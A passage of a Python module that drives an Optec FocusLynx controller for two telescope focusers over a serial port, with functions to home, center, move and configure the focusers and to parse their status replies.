in config_dict.keys():\n\t\tif config_dict['data_bits'] != 8:\n\t\t\tfocus_logger.critical('Unexpected number for data bits, 8 is'\\\n\t\t\t\t' expected')\n\t\t\traise ValueError('Unexpected number for data bits, 8 is expected')\n\telse:\n\t\tfocus_logger.critical('No data bits number found in config file')\n\t\traise KeyError('No data bits number found in config file')\n\t\n\t# STOP BITS\n\tif 'stop_bits' in config_dict.keys():\n\t\tif config_dict['stop_bits'] != 1:\n\t\t\tfocus_logger.critical('Unexpected number for stop bits, 1 is '\\\n\t\t\t\t'expected')\n\t\t\traise ValueError('Unexpected number for stop bits, 1 is expected')\n\telse:\n\t\tfocus_logger.critical('No stop bits number found in config file')\n\t\traise KeyError('No stop bits number found in config file')\n\t\n\t\n\t# PARITY\n\tif 'parity' in config_dict.keys():\n\t\tif config_dict['parity'] != 'N':\n\t\t\tfocus_logger.critical('Unexpected parity values, \"N\" is expected')\n\t\t\traise ValueError('Unexpected parity values, \"N\" is expected')\n\telse:\n\t\tfocus_logger.critical('No parity values found in config file')\n\t\traise KeyError('No parity values found in config file')\n\n\ndef get_start_end_char(command):\n\t\"\"\"\n\tThe focuser requires a '<' at the beginning and a '>' at the end of each \n\t command. This function will add these to any string passed by 'command'.\n\t \n\tPARAMETERS:\n\t\n\t\tcommand - the string command to which <> will be added.\n\t\t\n\tRETURN\n\t\n\t\tfull_command - the full command\n\t\t\n\t\"\"\"\n\n\tfull_command = '<'+str(command)+'>'\n\treturn full_command\n\ndef check_focuser_no(x):\n\t\n\t\"\"\"\n\tMost of the commands for the focuser require the focuser number to be\n\t sent. This can either be set to '1' or '2'. This function just makes sure \n\t that a valid number is sent.\n\t \n\t PARAMETERS:\n\t \n\t\tx = the focuser number to be checked.\n\t\t\"\"\"\n\t\n\tvalid_focuser_number = [1,2]\n\tif x not in valid_focuser_number:\n\t\tfocus_logger.error(str(x) + ' is not a valid focuser number.')\n\t\traise ValueError(str(x) + ' is not a valid focuser number.')\n\telse:\n\t\treturn x\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThese assume two focusers connected to one controller, use 'x' parameter to \n\tselect which one, 1=South, 2=North\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\ndef get_focuser_name(port, x=1):\n\t\"\"\"\n\tWill return the user defined nickname for focuser number 'x'.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\t\n\tRETURN:\n\t\tmessage = name for the focuser or an error message\n\t\n\t\"\"\"\n\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HELLO')\n\n\tmessage = common.send_command_two_response(command, port)\n\n\treturn message\n\ndef halt_focuser(port, x=1):\n\t\"\"\"\n\tGet focuser 'x' to stop its current motion. 
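A minimal usage sketch (hypothetical; assumes 'port' is a serial connection\n\t opened elsewhere, e.g. by common.open_port_from_config_param):\n\t\n\t\thalt_focuser(port, x=2) # stop the North focuser\n\t\n\t 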
If Temperature Compensation was \n\t active, it becomes deactivated\n\t \n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\n\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HALT')\n\t\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'HALTED':\n\t\tfocus_logger.info('Motion of Focuser '+str(x)+' HALTED')\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef home_focuser(port,x=1):\n\t\"\"\"\n\tAsk focuser 'x' to begin its homing routine. Controller will respond with 'H' to\n\t indicate it has started the homing procedure.\n\t\n\tNeed to first check that the telescope is stowed before homing...\n\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\t\n\t#Need to check to make sure the telescope is stowed before homing the\n\t# focusers. Focusers don't like trying to lift all the camera weight.\n\t\n\ttilt_stat = plc.plc_get_telescope_tilt_status()\n\tif tilt_stat['Tilt_angle'] == \"6h East <= x < RA East limit\" or \\\n\t\ttilt_stat['Tilt_angle'] == \"6h West <= x < RA West limit\":\n\t\n\t\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HOME')\n\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'H':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to home')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\telse:\n\t\tfocus_logger.error('Cannot home focuser, telescope is not parked')\n\t\tprint('Cannot home focuser, telescope is not parked')\n\ndef center_focuser(port, x=1):\n\n\t\"\"\"\n\tAsk focuser 'x' to move to the center of its travel. This is defined as \n\t being half the focuser's max position. The max position is defined by the \n\t device type that is selected???. Controller will respond with 'M' to \n\t indicate it has started moving.\n\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\n\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\t\n\t\"\"\"\n\ttilt_stat = plc.plc_get_telescope_tilt_status()\n\tif tilt_stat['Tilt_angle'] == \"6h East <= x < RA East limit\" or \\\n\t\ttilt_stat['Tilt_angle'] == \"6h West <= x < RA West limit\":\n\t\n\t\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'CENTER')\n\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to center')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\telse:\n\t\tfocus_logger.error('Cannot center focuser, telescope is not parked')\n\t\tprint('Cannot center focuser, telescope is not parked')\n\ndef move_to_position(pos, port, x=1):\n\n\n\t\"\"\"\n\tAsk focuser 'x' to move to the position specified by 'pos'. Must be between \n\t 0 and the focuser's maximum position (112000). 
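For example (hypothetical; 'port' assumed to be open):\n\t\n\t\tmove_to_position(56000, port, x=1) # roughly mid-travel\n\t\n\t 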
The controller will respond \n\t with 'M' when it starts moving.\n\t\n\tThis function will provide the necessary formatting to the 'pos' parameter\n\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\n\tPARAMETERS:\n\t\n\tpos = integer in range 0 to focuser max position (112000), to which the \n\tfocuser will move.\n\tx = 1 or 2 depending on which focuser the command is for\n\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\t\n\tif pos > 112000 or pos < 0:\n\t\tfocus_logger.error(str(pos)+ ' is an invalid position for focuser ' + x)\n\t\traise ValueError(str(pos)+ ' is an invalid position for focuser ' + x)\n\t\n\n\tformat_pos = '{0:>06}'.format(pos)\n\n\tcommand = get_start_end_char('F'+ x +'MA'+format_pos)\n\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'M':\n\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to position: '+ format_pos)\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef move_focuser_in(port, x=1, move_speed=1):\n\t\"\"\"\n\tAsk focuser 'x' to move inwards (i.e. away from max position of 112000). \n\t Focuser will continue to move until an 'end_relative_move' command is \n\t received or it reaches the end of its travel.\n\t\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\t\n\t\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmove_speed = 0 or 1, 0 for high speed, 1 for low speed\n\t\t\n\t\"\"\"\n\tvalid_speeds = [0,1]\n\tif move_speed not in valid_speeds:\n\t\tfocus_logger.error(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\traise ValueError(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\t\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'MIR'+str(move_speed))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving inwards')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef move_focuser_out(port, x=1, move_speed=1):\n\t\"\"\"\n\t\tAsk focuser 'x' to move outwards (i.e. towards the max position of \n\t\t 112000). Focuser will continue to move until an 'end_relative_move' \n\t\t command is received or it reaches the end of its travel.\n\t\t\n\t\t*** Should probably get something to check that it's stopped moving ****\n\t\t\n\t\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmove_speed = 0 or 1, 0 for high speed, 1 for low speed\n\t\t\n\t\t\"\"\"\n\tvalid_speeds = [0,1]\n\tif move_speed not in valid_speeds:\n\t\tfocus_logger.error(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\traise ValueError(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'MOR'+str(move_speed))\n\t\tmessage = common.send_command_two_response(command, port)\n\t\t\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving outwards')\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef end_relative_move(port, x=1):\n\n\t\"\"\"\n\tWill get focuser 'x' to stop any relative motion. It should respond with \n\t 'STOPPED' when complete. 
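A typical relative-move sequence might be (hypothetical; 'port' assumed open):\n\t\n\t\tmove_focuser_in(port, x=1, move_speed=1) # start a slow inward move\n\t\ttime.sleep(2) # let it travel briefly\n\t\tend_relative_move(port, x=1) # stop the motion\n\t\n\t 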
If it was previously running, Temperature \n\t compensation will be resumed after the command is issued.\n\t \n\t PARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'ERM')\n\tmessage = common.send_command_two_response(command, port)\n\t\t\n\tif message == 'STOPPED':\n\t\tfocus_logger.info('Focuser '+str(x)+ ' motion stopped.')\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef get_focuser_status(port, x=1, return_dict=True):\n\t\"\"\"\n\tWill get focuser 'x' to display its current status. Should start with the \n\t line 'STATUSx' where x will be the focuser number, and finish with the \n\t line 'END'.\n\t\n\t\n\tINFO IN STATUS MESSAGE: (from manual)\n\t\n\tTemp(C): The current temperature in degrees Celsius\n\t\n\tCurr Pos: The current position of the specified focuser\n\t\n\tTarget Pos: The absolute position that the device is currently moving to \n\t\t(if the device is moving)\n\t\n\tIsMoving: This flag is set to 1 if the device is moving and 0 if the device \n\t\tis stationary\n\t\n\tIsHoming: This flag is set to 1 while the device is homing and zero otherwise.\n\t\n\tIsHomed: For focusers that support homing, this flag will be set to 0 if the\n\t\tfocuser has not been homed and set to 1 when homed.\n\t\n\tFFDetect: Set to 1 when using an Optec FastFocus Focuser\n\t\n\tTmpProbe: This flag indicates the status of an attached temperature probe. \n\t\tA value of 1 means a probe is attached, 0 means no probe is detected.\n\t\n\tRemoteIO: This flag indicates the status of an attached In/Out remote. A \n\t\tvalue of 1 means a remote is attached, 0 means no remote is detected.\n\t\n\tHnd Ctrlr: This flag indicates the status of an attached hand controller. A \n\t\tvalue of 1 means a hand controller is attached, 0 means no hand \n\t\tcontroller is detected.\n\n\t \n\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\treturn_dict = True/False, set to true to get the status values returned \n\t\t\tas a dictionary\n\t\t\n\t\n\tRETURN\n\t\n\t\tmessage = The status message returned as a long string.\n\t\tmessage_dict = if return_dict is True, the message will be turned into a\n\t\t\tpython dictionary so parameters can be called to return values.\n\t\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'GETSTATUS')\n\tmessage = common.send_command_two_response(command, port,\n\t\texpected_end='END\\n')\n\n\tif return_dict == False:\n\t\treturn message\n\telse:\n\t\t#Convert string to python dictionary, as this will be easier to work\n\t\t# with in other parts of the code.\n\n\t\t#cut off the header + end bits, split into rows, and then split at equals\n\t\tmessage_dict = dict(row.split('=') for row in message[8:-4].split('\\n'))\n\t\t\n\t\t#Need to put the keys into a list, otherwise not all keys are looped\n\t\t# because the keys change during the loop. 
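(Iterating over message_dict.keys() directly while popping renamed entries skips some of them.) 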
Was only doing half the\n\t\t# keys.\n\t\tdict_key_list = list(message_dict.keys())\n\t\t# as it is, there are lots of spaces at the start/end of names and values,\n\t\t# this will remove them\n\t\tfor name in dict_key_list:\n\t\t\tmessage_dict[name] = message_dict[name].strip()\n\t\t\tmessage_dict[name.strip()] = message_dict.pop(name)\n\n\t\treturn message_dict\n\ndef get_focuser_stored_config(port, x = 1, return_dict = False):\n\t\"\"\"\n\t\n\tWill get the controller to report the configuration settings for focuser 'x'. \n\t Should start with the line 'CONFIGx' where x will be the focuser number, \n\t and finish with the line 'END'.\n\t\n\tINFO IN CONFIG MESSAGE: (from manual)\n\t\n\tNickname: The user-defined nickname of the specified focuser\n\t\n\tMaxPos: The maximum absolute position that the selected focuser is capable \n\t of moving to. This setting is determined automatically based on the\n\t selected Device Type.\n\t\n\tDev Typ: A two character designator of the currently set device type for the\n\t specified focuser. See the section entitled Appendix A – Device Types on \n\t page 17 for device type details.\n\t\n\tTComp ON: The current status of temperature compensation. 1 indicates the \n\t device is currently temperature compensating, 0 indicates temperature \n\t compensation is disabled.\n\t\n\tTemCo A-E: These items indicate the temperature coefficient for the \n\t respective temperature compensation mode. The units of the temperature \n\t coefficients are stepper motor steps per degree.\n\t\n\tTC Mode: Indicates the currently selected temperature compensation mode. \n\t When temperature compensation is turned on, the selected mode \n\t indicates which temperature coefficient will be used for compensation.\n\t\n\tBLC En: This flag indicates whether the internal backlash compensation is \n\t turned on or off. A value of 1 indicates that this feature is turned on, \n\t 0 indicates the feature is off.\n\t\n\tBLC Stps: This value indicates the number of steps that the focuser will \n\t travel past the target position before returning to the target position \n\t in order to compensate for mechanical backlash in the focusing device. A \n\t positive value indicates the compensation will occur when the focuser moves \n\t to a greater absolute position. A negative value indicates the compensation\n\twill occur on moves to a lesser position.\n\t\n\tLED Brt: This value indicates the \n\tcurrent setting for the brightness of the red power LED on the FocusLynx \n\tcontroller enclosure\n\t\n\tTC@Start: This value indicates if the Temperature Compensate at Start \n\t feature is turned on or off. A value of 1 indicates the feature is on, 0 \n\tindicates the feature is off. 
When this feature is enabled the device will \n\tautomatically perform a temperature compensation move immediately following \n\tdevice power-up.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\treturn_dict = True/False, set to true to get the config values returned \n\t\tas a dictionary\n\t\t\n\t\n\tRETURN\n\t\n\t\tmessage = The configuration message returned as a long string.\n\t\tmessage_dict = if return_dict is True, the message will be turned into \n\t\ta python dictionary so parameters can be called to return values.\n\t\t\n\t\n\t\"\"\"\n\t\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'GETCONFIG')\n\tmessage = common.send_command_two_response(command, port,\n\t\texpected_end='END\\n')\n\t\n\tif return_dict == False:\n\t\treturn message\n\telse:\n\t\t#Convert string to python dictionary, as this will be easier to work\n\t\t# with in other parts of the code.\n\t\t#cut off the config header + end bits, split into rows, and then split at equals\n\t\tmessage_dict = dict(row.split('=') for row in message[8:-4].split('\\n'))\n\t\t\n\t\t#Need to put the keys into a list, otherwise not all keys are looped\n\t\t# because the keys change during the loop. Was only doing half the\n\t\t# keys.\n\t\tdict_key_list = list(message_dict.keys())\n\t\t# as it is, there are lots of spaces at the start/end of names and values,\n\t\t# this will remove them\n\t\tfor name in dict_key_list:\n\t\t\tmessage_dict[name] = message_dict[name].strip()\n\t\t\tmessage_dict[name.strip()] = message_dict.pop(name)\n\n\n\t\treturn message_dict\n\n\ndef set_device_name(port, device_name, x=1):\n\t\"\"\"\n\tUse to set a new nickname for focuser 'x'. Controller will respond with \n\t'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tdevice_name = string with new name. Max 16 char\n\t\n\t\"\"\"\n\t# check the length of the new device nickname\n\tname_length = len(device_name)\n\tif name_length > 16 or name_length <= 0:\n\t\tfocus_logger.error('Invalid device name given')\n\t\traise ValueError('Invalid device name given')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCNN'+str(device_name))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Name for Focuser '+str(x)+ ' set as: ' + str(\n\t\t\t\tdevice_name))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_device_type(port, x = 1, device_type = 'OI'):\n\n\t\"\"\"\n\tUse this to specify the type of focuser attached. The controller uses this \n\tinformation to determine the correct speed and motor power to use. An \n\tincorrect value could damage a focuser. Valid settings are shown in \n\tAppendix A of the user manual, and are also listed here. 
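As an illustration only (the correct type for this hardware still needs confirming, see the dated note below):\n\t\n\t\tset_device_type(port, x=1, device_type='OB') # Optec TCF-Lynx 3\"\n\t\n\t 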
The controller will\n\t respond with 'SET' once complete.\n\t\n\t\n\tAvailable Types:\n\t\n\t\tOA: Optec TCF-Lynx 2”\n\t\tOB: Optec TCF-Lynx 3”\n\t\tOC: Optec TCF-Lynx 2” with Extended Travel\n\t\tOD: Optec Fast Focus Secondary Focuser\n\t\tOE: Optec TCF-S Classic converted (original unipolar motor)\n\t\tOF: Optec TCF-S3 Classic converted (original unipolar motor)\n\t\tOG: Optec Gemini (reserved for future use)\n\t\tOI: what it was initially set as\n\t\tFA: FocusLynx QuickSync FT Hi-Torque\n\t\tFB: FocusLynx QuickSync FT Hi-Speed\n\t\n\t*** 2/11/18 ***\n\tI think the focusers are TCF-S 3\" so device type OB, but need to check.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\t\n\t\tport = the open port for communicating with the focuser\n\t\t\n\t\tdevice_type = string, 2 characters in length to set what type of focuser\n\t\t is connected to the control box. Valid options: OA, OB, OC, OD, OE, OF,\n\t\t OG, FA, and FB. See Appendix A of controller manual for more info.\n\n\t\n\t\"\"\"\n\n\tvalid_device_types = ['OA', 'OB', 'OC', 'OD', 'OE',\n\t\t\t\t\t\t\t'OF', 'OG', 'FA', 'FB', 'OI']\n\n\tif device_type not in valid_device_types:\n\n\t\tfocus_logger.error(str(device_type) + ' is not a valid device type.')\n\t\traise ValueError(str(device_type) + ' is not a valid device type.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCDT'+str(device_type))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Device Type for Focuser '+str(x)+ ' set '\\\n\t\t\t\t'as: ' + str(device_type))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\n\ndef set_temp_comp(port, x =1, temp_comp = False):\n\t\"\"\"\n\tUse to enable/disable the temperature compensation feature for focuser 'x'.\n\t Controller will respond with 'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\ttemp_comp = True/False. True will enable the temperature compensation \n\t\t\tfeature, False will disable\n\n\n\t\"\"\"\n\tif temp_comp == True:\n\t\ttc_state = 'ENABLED'\n\t\tsetno = str(1)\n\t\n\telif temp_comp == False:\n\t\ttc_state = 'DISABLED'\n\t\tsetno = str(0)\n\telse:\n\t\t#print(temp_comp)\n\t\t#print(type(temp_comp))\n\t\tfocus_logger.error('Invalid input for temperature compensation control'\\\n\t\t\t'. True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for temperature compensation control.'\\\n\t\t\t' True=Enable, False=Disable')\n\n\tx = str(check_focuser_no(x))\n\t#print(temp_comp)\n\tcommand = get_start_end_char('F'+ x +'SCTE'+str(setno))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('Temperature compensation ' + tc_state + ' for'\\\n\t\t\t' focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef set_temp_comp_mode(port, x=1, mode='A'):\n\n\t\"\"\"\n\tUse this to set the mode used when temperature compensation is enabled.\n\t For example, selecting mode 'C' will mean that temperature coefficient \n\t 'C' will be used. The controller will respond with 'SET' once complete.\n\t\t\n\t\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmode = Mode to be selected for the temperature compensation. 
\n\t\tSuitable values are: A, B, C, D or E.\n\t\n\t\"\"\"\n\n\tvalid_modes = ['A','B','C','D','E']\n\tif mode not in valid_modes:\n\t\tfocus_logger.error(str(mode)+ ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\t\traise ValueError(str(mode) + ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCTM'+str(mode))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Temperature compensation mode ' + str(\n\t\t\t\tmode) + ' set for focuser '+str(x))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef set_temp_comp_coeff(port,mode,temp_coeff_val, x=1):\n\n\t\"\"\"\n\tUse this function to set the temperature coefficients for each of the \n\t\tmodes, for each focuser.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmode = Mode to be selected for the temperature compensation. Suitable \n\t\t\tvalues are: A, B, C, D or E.\n\t\ttemp_coeff_val = integer (in steps per degree) to be used for the \n\t\t\tcoefficient. Between -9999 and 9999.\n\t\n\t\"\"\"\n\n\tvalid_modes = ['A','B','C','D','E']\n\tif mode not in valid_modes:\n\t\tfocus_logger.error(str(mode)+ ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\t\traise ValueError(str(mode) + ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\n\n\tif isinstance(temp_coeff_val, int) == False:\n\t\tfocus_logger.error('Temperature compensation coefficient must be '\\\n\t\t\t'an integer')\n\telse:\n\n\t\tif temp_coeff_val < -9999 or temp_coeff_val > 9999:\n\t\t\tfocus_logger.error('Invalid value entered for the temperature '\\\n\t\t\t\t'compensation coefficient')\n\n\t\telse:\n\n\t\t\tx = str(check_focuser_no(x))\n\t\t\tformatted_coeff = '{0:=+05}'.format(temp_coeff_val)\n\t\t\tcommand = get_start_end_char('F'+ x +'SCTC'+str(\n\t\t\t\tmode)+formatted_coeff)\n\t\t\t\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('Temperature compensation coefficient '\\\n\t\t\t\t\t'set as ' + formatted_coeff +\n\t\t\t\t' for mode: '+ str(mode) + ' and for focuser '+str(x))\n\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_temp_comp_start_state(port, x=1, temp_comp_start = False):\n\n\t\"\"\"\n\tEnable or disable the 'Temperature Compensation at Start' feature on the \n\t controller. When enabled, the controller will perform a temperature \n\t compensation move when the device is first switched on, using the \n\t temperature recorded last time the compensation feature was switched on. \n\t Controller will respond with 'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\ttemp_comp_start = True/False. True will enable the 'temperature \n\t\t\tcompensation at start' feature, False will disable it.\n\t\n\t\"\"\"\n\tif temp_comp_start == False:\n\t\ttcs_state = 'DISABLED'\n\t\tset_no = 0\n\telif temp_comp_start == True:\n\t\ttcs_state = 'ENABLED'\n\t\tset_no =1\n\telse:\n\t\tfocus_logger.error('Invalid input for \"temperature compensation at '\\\n\t\t\t'start\" control. True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for \"temperature compensation at '\\\n\t\t\t'start\" control. 
True=Enable, False=Disable')\n\n\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'SCTS'+str(set_no))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('\"Temperature compensation at start\" state set '\\\n\t\t\t'to ' + tcs_state + ' for focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_backlash_comp(port,x=1, backlash_comp = False):\n\n\t\"\"\"\n\tEnable or disable the 'Backlash Compensation' feature on the \n\t controller. When enabled, the controller will move the focuser past the \n\t target position (by a number of steps that is set using the \n\t set_backlash_steps() function) and then return to the target position. \n\t This is so the focuser always approaches the target position to try to \n\t avoid mechanical backlash. Backlash compensation is carried out on all \n\t outward moves (never on inward moves). Controller will respond with 'SET' \n\t once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tbacklash_comp = True/False. True will enable the backlash compensation\n\t\t feature, False will disable it.\n\t\n\t\"\"\"\n\tif backlash_comp == False:\n\t\tbl_state = 'DISABLED'\n\t\tset_no = 0\n\telif backlash_comp == True:\n\t\tbl_state = 'ENABLED'\n\t\tset_no =1\n\telse:\n\t\tfocus_logger.error('Invalid input for backlash compensation control.'\\\n\t\t\t' True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for backlash compensation control. '\\\n\t\t\t'True=Enable, False=Disable')\n\n\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'SCBE'+str(set_no))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('Backlash compensation state set to ' + bl_state +\n\t\t\t' for focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef set_backlash_steps(port,x=1, backlash_steps = 10):\n\n\t\"\"\"\n\tUse to set the number of steps the focuser will move past the target \n\t position whilst carrying out a backlash compensation move. Backlash \n\t compensation is carried out on all outward moves (never on inward moves). \n\t Controller will respond with 'SET' once complete.\n\t\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tbacklash_steps = Integer between 0-99, for the number of steps past the \n\t\t\ttarget point the focuser will move.\n\t\n\t\"\"\"\n\t#make sure value is an integer\n\tif isinstance(backlash_steps, int) == False:\n\t\tfocus_logger.error('Backlash steps value must be an integer.')\n\t\t\n\telse:\n\t\tif backlash_steps<=0 or backlash_steps >99:\n\t\t\tfocus_logger.error('Backlash steps must be between 0 and 99')\n\n\t\telse:\n\t\t\tx = str(check_focuser_no(x))\n\t\t\tformatted_steps = '{0:>02}'.format(backlash_steps)\n\t\t\tcommand = get_start_end_char('F'+ x +'SCBS'+str(formatted_steps))\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('Backlash steps set to ' + formatted_steps +\n\t\t\t\t\t' for focuser '+str(x))\n\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\ndef set_LED_brightness(brightness, port):\n\n\t\"\"\"\n\tUse 'brightness' to change the brightness of the LED on the controller \n\t enclosure. 0 will turn off the LED. 
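For instance (hypothetical; 'port' assumed open):\n\t\n\t\tset_LED_brightness(75, port) # LED at 75 out of 100\n\t\n\t 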
Controller will respond with 'SET' \n\t once complete.\n\t\n\tPARAMETERS:\n\t\n\tbrightness = An integer between 0 and 100. 0 will turn off the LED.\n\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\t\n\n\tif isinstance(brightness, int):\n\t\n\t\tif brightness > 100 or brightness < 0:\n\t\t\tfocus_logger.error(str(brightness)+ ' is an invalid value for '\\\n\t\t\t\t'brightness setting.')\n\t\telse:\n\t\t\tformat_bright = '{0:>03}'.format(brightness)\n\n\t\t\tcommand = get_start_end_char('FHSCLB'+format_bright)\n\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('LED brightness set to: ' + str(\n\t\t\t\t\tformat_bright))\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\n\telse:\n\t\n\t\tfocus_logger.error('Check value entered for brightness setting.')\n\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nGroup OBSERVING FUNCTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\ndef focuser_initial_configuration(config_file_name,\n\t\t\tconfig_file_loc = 'configs/'):\n\t\"\"\"\n\t\n\tThis function will set all the settings needed to run a focuser. The \n\t settings will be loaded from a configuration file, and passed to the\n\t relevant control functions.\n\t \n\t Don't think this will need to be done every time the focuser is run, just \n\t when first set up, unless you'd like to change the settings.\n\t \n\t General description of 